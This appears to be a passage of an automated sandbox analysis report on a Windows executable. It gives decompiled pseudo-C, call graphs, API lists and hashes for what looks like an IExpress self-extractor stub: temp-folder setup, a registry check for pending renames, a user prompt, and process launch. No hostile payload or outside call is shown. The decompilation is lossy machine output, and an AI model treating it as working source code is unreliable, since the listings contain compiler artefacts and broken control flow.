                              • Part of subcall function 009453A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094542B
                              • Part of subcall function 009453A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945434
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                            • API String ID: 1979080616-2738818301
                            • Opcode ID: eeeddecbb6c8b0dfaeb1e8249e684aa58107d88acd934f097c5e691fb3bbbd1b
                            • Instruction ID: ceaa131d5c8f472ed7c03675aab9852cb3646924983a79e4f0b83dd13d846653
                            • Opcode Fuzzy Hash: eeeddecbb6c8b0dfaeb1e8249e684aa58107d88acd934f097c5e691fb3bbbd1b
                            • Instruction Fuzzy Hash: 00313971B14A04ABCB20AFA99C44E7F77AFABC7744B06012AF402D2652DF74CE41C691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 519 94256d-94257d 520 942622-942627 call 9424e0 519->520 521 942583-942589 519->521 526 942629-94262f 520->526 522 9425e8-942607 RegOpenKeyExA 521->522 523 94258b 521->523 527 9425e3-9425e6 522->527 528 942609-942620 RegQueryInfoKeyA 522->528 525 942591-942595 523->525 523->526 525->526 530 94259b-9425ba RegOpenKeyExA 525->530 527->526 531 9425d1-9425dd RegCloseKey 528->531 530->527 532 9425bc-9425cb RegQueryValueExA 530->532 531->527 532->531
                            C-Code - Quality: 86%
                            			E0094256D(signed int __ecx) {
                            				int _v8;
                            				void* _v12;
                            				signed int _t13;
                            				signed int _t19;
                            				long _t24;
                            				void* _t26;
                            				int _t31;
                            				void* _t34;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t13 = __ecx & 0x0000ffff;
                            				_t31 = 0;
                            				if(_t13 == 0) {
                            					_t31 = E009424E0(_t26);
                            				} else {
                            					_t34 = _t13 - 1;
                            					if(_t34 == 0) {
                            						_v8 = 0;
                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                            							goto L7;
                            						} else {
                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                            							goto L6;
                            						}
                            						L12:
                            					} else {
                            						if(_t34 > 0 && __ecx <= 3) {
                            							_v8 = 0;
                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                            							if(_t24 == 0) {
                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                            								L6:
                            								asm("sbb eax, eax");
                            								_v8 = _v8 &  !( ~_t19);
                            								RegCloseKey(_v12); // executed
                            							}
                            							L7:
                            							_t31 = _v8;
                            						}
                            					}
                            				}
                            				return _t31;
                            				goto L12;
                            			}











                            0x00942572
                            0x00942573
                            0x00942575
                            0x00942578
                            0x0094257d
                            0x00942627
                            0x00942583
                            0x00942586
                            0x00942589
                            0x009425eb
                            0x00942607
                            0x00000000
                            0x00942609
                            0x0094261a
                            0x00000000
                            0x0094261a
                            0x00000000
                            0x0094258b
                            0x0094258b
                            0x0094259e
                            0x009425b2
                            0x009425ba
                            0x009425cb
                            0x009425d1
                            0x009425d6
                            0x009425da
                            0x009425dd
                            0x009425dd
                            0x009425e3
                            0x009425e3
                            0x009425e3
                            0x0094258b
                            0x00942589
                            0x0094262f
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00944096,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?), ref: 009425B2
                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?,00944096), ref: 009425CB
                            • RegCloseKey.KERNELBASE(?,?,00941ED3,00000001,00000000,?,?,00944137,?,00944096), ref: 009425DD
                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00944096,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?), ref: 009425FF
                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00944096,00000000,00000000,00000000,00000000,?,00941ED3,00000001,00000000), ref: 0094261A
                            Strings
                            • System\CurrentControlSet\Control\Session Manager, xrefs: 009425A8
                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009425F5
                            • PendingFileRenameOperations, xrefs: 009425C3
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: OpenQuery$CloseInfoValue
                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                            • API String ID: 2209512893-559176071
                            • Opcode ID: cb5717be402fe4f413a4b4187ea84fd2dc45065eb8d9f1cd986d0536f012bf30
                            • Instruction ID: f2d1cf4b9ceb71878cfc3bc4cc4ec19e341ffc0bdf0770af6e9c684b3edeb7b4
                            • Opcode Fuzzy Hash: cb5717be402fe4f413a4b4187ea84fd2dc45065eb8d9f1cd986d0536f012bf30
                            • Instruction Fuzzy Hash: D3115135966228BB9B30AB91AC09DFFBF7CEF467A5F504056F808E2010DA305E44E6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 533 946a60-946a91 call 947155 call 947208 GetStartupInfoW 539 946a93-946aa2 533->539 540 946aa4-946aa6 539->540 541 946abc-946abe 539->541 542 946aaf-946aba Sleep 540->542 543 946aa8-946aad 540->543 544 946abf-946ac5 541->544 542->539 543->544 545 946ac7-946acf _amsg_exit 544->545 546 946ad1-946ad7 544->546 547 946b0b-946b11 545->547 548 946b05 546->548 549 946ad9-946ae9 call 946c3f 546->549 550 946b13-946b24 _initterm 547->550 551 946b2e-946b30 547->551 548->547 555 946aee-946af2 549->555 550->551 553 946b32-946b39 551->553 554 946b3b-946b42 551->554 553->554 556 946b44-946b51 call 947060 554->556 557 946b67-946b71 554->557 555->547 558 946af4-946b00 555->558 556->557 569 946b53-946b65 556->569 561 946b74-946b79 557->561 559 946c39-946c3e call 94724d 558->559 564 946bc5-946bc8 561->564 565 946b7b-946b7d 561->565 570 946bd6-946be3 _ismbblead 564->570 571 946bca-946bd3 564->571 566 946b94-946b98 565->566 567 946b7f-946b81 565->567 573 946ba0-946ba2 566->573 574 946b9a-946b9e 566->574 567->564 572 946b83-946b85 567->572 569->557 575 946be5-946be6 570->575 576 946be9-946bed 570->576 571->570 572->566 578 946b87-946b8a 572->578 579 946ba3-946bbc call 942bfb 573->579 574->579 575->576 576->561 577 946c1e-946c25 576->577 581 946c27-946c2d _cexit 577->581 582 946c32 577->582 578->566 583 946b8c-946b92 578->583 579->577 586 946bbe-946bbf exit 579->586 581->582 582->559 583->572 586->564
                            C-Code - Quality: 51%
                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				signed int* _t25;
                            				signed int _t26;
                            				signed int _t29;
                            				int _t30;
                            				signed int _t37;
                            				signed char _t41;
                            				signed int _t53;
                            				signed int _t54;
                            				intOrPtr _t56;
                            				signed int _t58;
                            				signed int _t59;
                            				intOrPtr* _t60;
                            				void* _t62;
                            				void* _t67;
                            				void* _t68;
                            
                            				E00947155();
                            				_push(0x58);
                            				_push(0x9472b8);
                            				E00947208(__ebx, __edi, __esi);
                            				 *(_t62 - 0x20) = 0;
                            				GetStartupInfoW(_t62 - 0x68);
                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                            				_t53 = 0;
                            				while(1) {
                            					asm("lock cmpxchg [edx], ecx");
                            					if(0 == 0) {
                            						break;
                            					}
                            					if(0 != _t56) {
                            						Sleep(0x3e8);
                            						continue;
                            					} else {
                            						_t58 = 1;
                            						_t53 = 1;
                            					}
                            					L7:
                            					_t67 =  *0x9488b0 - _t58; // 0x2
                            					if(_t67 != 0) {
                            						__eflags =  *0x9488b0; // 0x2
                            						if(__eflags != 0) {
                            							 *0x9481e4 = _t58;
                            							goto L13;
                            						} else {
                            							 *0x9488b0 = _t58;
                            							_t37 = E00946C3F(0x9410b8, 0x9410c4); // executed
                            							__eflags = _t37;
                            							if(__eflags == 0) {
                            								goto L13;
                            							} else {
                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            								_t30 = 0xff;
                            							}
                            						}
                            					} else {
                            						_push(0x1f);
                            						L00946FF4();
                            						L13:
                            						_t68 =  *0x9488b0 - _t58; // 0x2
                            						if(_t68 == 0) {
                            							_push(0x9410b4);
                            							_push(0x9410ac);
                            							L00947202();
                            							 *0x9488b0 = 2;
                            						}
                            						if(_t53 == 0) {
                            							 *0x9488ac = 0;
                            						}
                            						_t71 =  *0x9488b4;
                            						if( *0x9488b4 != 0 && E00947060(_t71, 0x9488b4) != 0) {
                            							_t60 =  *0x9488b4; // 0x0
                            							 *0x94a288(0, 2, 0);
                            							 *_t60();
                            						}
                            						_t25 = __imp___acmdln; // 0x777d5b9c
                            						_t59 =  *_t25;
                            						 *(_t62 - 0x1c) = _t59;
                            						_t54 =  *(_t62 - 0x20);
                            						while(1) {
                            							_t41 =  *_t59;
                            							if(_t41 > 0x20) {
                            								goto L32;
                            							}
                            							if(_t41 != 0) {
                            								if(_t54 != 0) {
                            									goto L32;
                            								} else {
                            									while(_t41 != 0 && _t41 <= 0x20) {
                            										_t59 = _t59 + 1;
                            										 *(_t62 - 0x1c) = _t59;
                            										_t41 =  *_t59;
                            									}
                            								}
                            							}
                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                            								_t29 = 0xa;
                            							} else {
                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                            							}
                            							_push(_t29);
                            							_t30 = E00942BFB(0x940000, 0, _t59); // executed
                            							 *0x9481e0 = _t30;
                            							__eflags =  *0x9481f8;
                            							if( *0x9481f8 == 0) {
                            								exit(_t30); // executed
                            								goto L32;
                            							}
                            							__eflags =  *0x9481e4;
                            							if( *0x9481e4 == 0) {
                            								__imp___cexit();
                            								_t30 =  *0x9481e0; // 0x0
                            							}
                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            							goto L40;
                            							L32:
                            							__eflags = _t41 - 0x22;
                            							if(_t41 == 0x22) {
                            								__eflags = _t54;
                            								_t15 = _t54 == 0;
                            								__eflags = _t15;
                            								_t54 = 0 | _t15;
                            								 *(_t62 - 0x20) = _t54;
                            							}
                            							_t26 = _t41 & 0x000000ff;
                            							__imp___ismbblead(_t26);
                            							__eflags = _t26;
                            							if(_t26 != 0) {
                            								_t59 = _t59 + 1;
                            								__eflags = _t59;
                            								 *(_t62 - 0x1c) = _t59;
                            							}
                            							_t59 = _t59 + 1;
                            							 *(_t62 - 0x1c) = _t59;
                            						}
                            					}
                            					L40:
                            					return E0094724D(_t30);
                            				}
                            				_t58 = 1;
                            				__eflags = 1;
                            				goto L7;
                            			}


















                            0x00946a60
                            0x00946a6a
                            0x00946a6c
                            0x00946a71
                            0x00946a78
                            0x00946a7f
                            0x00946a85
                            0x00946a8e
                            0x00946a91
                            0x00946a93
                            0x00946a9c
                            0x00946aa2
                            0x00000000
                            0x00000000
                            0x00946aa6
                            0x00946ab4
                            0x00000000
                            0x00946aa8
                            0x00946aaa
                            0x00946aab
                            0x00946aab
                            0x00946abf
                            0x00946abf
                            0x00946ac5
                            0x00946ad1
                            0x00946ad7
                            0x00946b05
                            0x00000000
                            0x00946ad9
                            0x00946ad9
                            0x00946ae9
                            0x00946af0
                            0x00946af2
                            0x00000000
                            0x00946af4
                            0x00946af4
                            0x00946afb
                            0x00946afb
                            0x00946af2
                            0x00946ac7
                            0x00946ac7
                            0x00946ac9
                            0x00946b0b
                            0x00946b0b
                            0x00946b11
                            0x00946b13
                            0x00946b18
                            0x00946b1d
                            0x00946b24
                            0x00946b24
                            0x00946b30
                            0x00946b39
                            0x00946b39
                            0x00946b3b
                            0x00946b42
                            0x00946b57
                            0x00946b5f
                            0x00946b65
                            0x00946b65
                            0x00946b67
                            0x00946b6c
                            0x00946b6e
                            0x00946b71
                            0x00946b74
                            0x00946b74
                            0x00946b79
                            0x00000000
                            0x00000000
                            0x00946b7d
                            0x00946b81
                            0x00000000
                            0x00000000
                            0x00946b83
                            0x00946b8c
                            0x00946b8d
                            0x00946b90
                            0x00946b90
                            0x00946b83
                            0x00946b81
                            0x00946b94
                            0x00946b98
                            0x00946ba2
                            0x00946b9a
                            0x00946b9a
                            0x00946b9a
                            0x00946ba3
                            0x00946bab
                            0x00946bb0
                            0x00946bb5
                            0x00946bbc
                            0x00946bbf
                            0x00000000
                            0x00946bbf
                            0x00946c1e
                            0x00946c25
                            0x00946c27
                            0x00946c2d
                            0x00946c2d
                            0x00946c32
                            0x00000000
                            0x00946bc5
                            0x00946bc5
                            0x00946bc8
                            0x00946bcc
                            0x00946bce
                            0x00946bce
                            0x00946bd1
                            0x00946bd3
                            0x00946bd3
                            0x00946bd6
                            0x00946bda
                            0x00946be1
                            0x00946be3
                            0x00946be5
                            0x00946be5
                            0x00946be6
                            0x00946be6
                            0x00946be9
                            0x00946bea
                            0x00946bea
                            0x00946b74
                            0x00946c39
                            0x00946c3e
                            0x00946c3e
                            0x00946abe
                            0x00946abe
                            0x00000000

                            APIs
                              • Part of subcall function 00947155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00947182
                              • Part of subcall function 00947155: GetCurrentProcessId.KERNEL32 ref: 00947191
                              • Part of subcall function 00947155: GetCurrentThreadId.KERNEL32 ref: 0094719A
                              • Part of subcall function 00947155: GetTickCount.KERNEL32 ref: 009471A3
                              • Part of subcall function 00947155: QueryPerformanceCounter.KERNEL32(?), ref: 009471B8
                            • GetStartupInfoW.KERNEL32(?,009472B8,00000058), ref: 00946A7F
                            • Sleep.KERNEL32(000003E8), ref: 00946AB4
                            • _amsg_exit.MSVCRT ref: 00946AC9
                            • _initterm.MSVCRT ref: 00946B1D
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00946B49
                            • exit.KERNELBASE ref: 00946BBF
                            • _ismbblead.MSVCRT ref: 00946BDA
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                            • String ID:
                            • API String ID: 836923961-0
                            • Opcode ID: c0090fbba3f163abffc660a9234577ab64c19b69f2d641002c9cbbe884d3edc8
                            • Instruction ID: f380fcfd9f3ce58b3a92de3c384a4547f4257eb4c7716938dffa1dfe323b5e69
                            • Opcode Fuzzy Hash: c0090fbba3f163abffc660a9234577ab64c19b69f2d641002c9cbbe884d3edc8
                            • Instruction Fuzzy Hash: 6841E2B495C3249BDB21AF68DC05F6E77E8EB8B725F14411AF951E3290CB744881AB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 587 9458c8-9458d5 588 9458d8-9458dd 587->588 588->588 589 9458df-9458f1 LocalAlloc 588->589 590 9458f3-945901 call 9444b9 589->590 591 945919-945959 call 941680 call 94658a CreateFileA LocalFree 589->591 595 945906-945910 call 946285 590->595 591->595 601 94595b-94596c CloseHandle GetFileAttributesA 591->601 600 945912-945918 595->600 601->595 602 94596e-945970 601->602 602->595 603 945972-94597b 602->603 603->600
                            C-Code - Quality: 95%
                            			E009458C8(intOrPtr* __ecx) {
                            				void* _v8;
                            				intOrPtr _t6;
                            				void* _t10;
                            				void* _t12;
                            				void* _t14;
                            				signed char _t16;
                            				void* _t20;
                            				void* _t23;
                            				intOrPtr* _t27;
                            				CHAR* _t33;
                            
                            				_push(__ecx);
                            				_t33 = __ecx;
                            				_t27 = __ecx;
                            				_t23 = __ecx + 1;
                            				do {
                            					_t6 =  *_t27;
                            					_t27 = _t27 + 1;
                            				} while (_t6 != 0);
                            				_t36 = _t27 - _t23 + 0x14;
                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                            				if(_t20 != 0) {
                            					E00941680(_t20, _t36, _t33);
                            					E0094658A(_t20, _t36, "TMP4351$.TMP");
                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                            					_v8 = _t10;
                            					LocalFree(_t20);
                            					_t12 = _v8;
                            					if(_t12 == 0xffffffff) {
                            						goto L4;
                            					} else {
                            						CloseHandle(_t12);
                            						_t16 = GetFileAttributesA(_t33); // executed
                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                            							goto L4;
                            						} else {
                            							 *0x949124 = 0;
                            							_t14 = 1;
                            						}
                            					}
                            				} else {
                            					E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
                            					L4:
                            					 *0x949124 = E00946285();
                            					_t14 = 0;
                            				}
                            				return _t14;
                            			}













                            0x009458cd
                            0x009458d1
                            0x009458d3
                            0x009458d5
                            0x009458d8
                            0x009458d8
                            0x009458da
                            0x009458db
                            0x009458e1
                            0x009458ed
                            0x009458f1
                            0x0094591e
                            0x0094592c
                            0x00945943
                            0x0094594a
                            0x0094594d
                            0x00945953
                            0x00945959
                            0x00000000
                            0x0094595b
                            0x0094595c
                            0x00945963
                            0x0094596c
                            0x00000000
                            0x00945972
                            0x00945974
                            0x0094597a
                            0x0094597a
                            0x0094596c
                            0x009458f3
                            0x00945901
                            0x00945906
                            0x0094590b
                            0x00945910
                            0x00945910
                            0x00945918

                            APIs
                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009458E7
                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945943
                            • LocalFree.KERNEL32(00000000,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094594D
                            • CloseHandle.KERNEL32(00000000,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094595C
                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945963
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                            • API String ID: 747627703-2560997688
                            • Opcode ID: 47a75435ed2e88c88386766afca01516bdbca861d0cd33fd1d60b4df5a9ed5c7
                            • Instruction ID: d52baf2f2c0a94df19affcfed7961f919e086007cb2131610cff1e218812984a
                            • Opcode Fuzzy Hash: 47a75435ed2e88c88386766afca01516bdbca861d0cd33fd1d60b4df5a9ed5c7
                            • Instruction Fuzzy Hash: 781134756182106BD7241FB9AC0DF9B7F9DDF8B774B100619F50AE32D2CA708C05C2A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 631 943fef-944010 632 944016-94403b CreateProcessA 631->632 633 94410a-94411a call 946ce0 631->633 634 9440c4-944101 call 946285 GetLastError FormatMessageA call 9444b9 632->634 635 944041-94406e WaitForSingleObject GetExitCodeProcess 632->635 647 944106 634->647 638 944070-944077 635->638 639 944091 call 94411b 635->639 638->639 642 944079-94407b 638->642 646 944096-9440b8 CloseHandle * 2 639->646 642->639 645 94407d-944089 642->645 645->639 648 94408b 645->648 649 944108 646->649 650 9440ba-9440c0 646->650 647->649 648->639 649->633 650->649 651 9440c2 650->651 651->647
                            C-Code - Quality: 84%
                            			E00943FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                            				signed int _v8;
                            				char _v524;
                            				long _v528;
                            				struct _PROCESS_INFORMATION _v544;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t20;
                            				void* _t22;
                            				int _t25;
                            				intOrPtr* _t39;
                            				signed int _t44;
                            				void* _t49;
                            				signed int _t50;
                            				intOrPtr _t53;
                            
                            				_t45 = __edx;
                            				_t20 =  *0x948004; // 0xec518a5e
                            				_v8 = _t20 ^ _t50;
                            				_t39 = __ecx;
                            				_t49 = 1;
                            				_t22 = 0;
                            				if(__ecx == 0) {
                            					L13:
                            					return E00946CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                            				}
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                            				if(_t25 == 0) {
                            					 *0x949124 = E00946285();
                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                            					_t45 = 0x4c4;
                            					E009444B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                            					L11:
                            					_t49 = 0;
                            					L12:
                            					_t22 = _t49;
                            					goto L13;
                            				}
                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                            				_t44 = _v528;
                            				_t53 =  *0x948a28; // 0x0
                            				if(_t53 == 0) {
                            					_t34 =  *0x949a2c; // 0x0
                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                            						_t34 = _t44 & 0xff000000;
                            						if((_t44 & 0xff000000) == 0xaa000000) {
                            							 *0x949a2c = _t44;
                            						}
                            					}
                            				}
                            				E0094411B(_t34, _t44);
                            				CloseHandle(_v544.hThread);
                            				CloseHandle(_v544);
                            				if(( *0x949a34 & 0x00000400) == 0 || _v528 >= 0) {
                            					goto L12;
                            				} else {
                            					goto L11;
                            				}
                            			}


















                            0x00943fef
                            0x00943ffa
                            0x00944001
                            0x00944008
                            0x0094400a
                            0x0094400b
                            0x00944010
                            0x0094410a
                            0x0094411a
                            0x0094411a
                            0x0094401c
                            0x0094401d
                            0x0094401e
                            0x0094401f
                            0x00944033
                            0x0094403b
                            0x009440ca
                            0x009440e9
                            0x009440f8
                            0x00944101
                            0x00944106
                            0x00944106
                            0x00944108
                            0x00944108
                            0x00000000
                            0x00944108
                            0x00944049
                            0x0094405c
                            0x00944062
                            0x00944068
                            0x0094406e
                            0x00944070
                            0x00944077
                            0x0094407f
                            0x00944089
                            0x0094408b
                            0x0094408b
                            0x00944089
                            0x00944077
                            0x00944091
                            0x0094409c
                            0x009440a8
                            0x009440b8
                            0x00000000
                            0x009440c2
                            0x00000000
                            0x009440c2

                            APIs
                            • CreateProcessA.KERNELBASE ref: 00944033
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00944049
                            • GetExitCodeProcess.KERNELBASE ref: 0094405C
                            • CloseHandle.KERNEL32(?), ref: 0094409C
                            • CloseHandle.KERNEL32(?), ref: 009440A8
                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009440DC
                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 009440E9
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                            • String ID:
                            • API String ID: 3183975587-0
                            • Opcode ID: 82e10136b1c309505799f2dc3ac8fa3d7b995869468409e326e8184bdede697e
                            • Instruction ID: c1f552f204d82509febfcdb913eb20a06223f37efc883cfcb95b98911fbc8b95
                            • Opcode Fuzzy Hash: 82e10136b1c309505799f2dc3ac8fa3d7b995869468409e326e8184bdede697e
                            • Instruction Fuzzy Hash: 4431DF39698208ABEB309F65DC49FAB777CEB9A715F1001A9F605E21A1CA304C81DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 652 9451e5-94520b call 94468f LocalAlloc 655 94522d-94523c call 94468f 652->655 656 94520d-945228 call 9444b9 call 946285 652->656 661 945262-945270 lstrcmpA 655->661 662 94523e-945260 call 9444b9 LocalFree 655->662 671 9452b0 656->671 665 945272-945273 LocalFree 661->665 666 94527e-94529c call 9444b9 LocalFree 661->666 662->671 669 945279-94527c 665->669 674 9452a6 666->674 675 94529e-9452a4 666->675 672 9452b2-9452b5 669->672 671->672 674->671 675->669
                            C-Code - Quality: 100%
                            			E009451E5(void* __eflags) {
                            				int _t5;
                            				void* _t6;
                            				void* _t28;
                            
                            				_t1 = E0094468F("UPROMPT", 0, 0) + 1; // 0x1
                            				_t28 = LocalAlloc(0x40, _t1);
                            				if(_t28 != 0) {
                            					if(E0094468F("UPROMPT", _t28, _t29) != 0) {
                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                            						if(_t5 != 0) {
                            							_t6 = E009444B9(0, 0x3e9, _t28, 0, 0x20, 4);
                            							LocalFree(_t28);
                            							if(_t6 != 6) {
                            								 *0x949124 = 0x800704c7;
                            								L10:
                            								return 0;
                            							}
                            							 *0x949124 = 0;
                            							L6:
                            							return 1;
                            						}
                            						LocalFree(_t28);
                            						goto L6;
                            					}
                            					E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
                            					LocalFree(_t28);
                            					 *0x949124 = 0x80070714;
                            					goto L10;
                            				}
                            				E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
                            				 *0x949124 = E00946285();
                            				goto L10;
                            			}






                            0x009451fb
                            0x00945207
                            0x0094520b
                            0x0094523c
                            0x00945268
                            0x00945270
                            0x0094528b
                            0x00945293
                            0x0094529c
                            0x009452a6
                            0x009452b0
                            0x00000000
                            0x009452b0
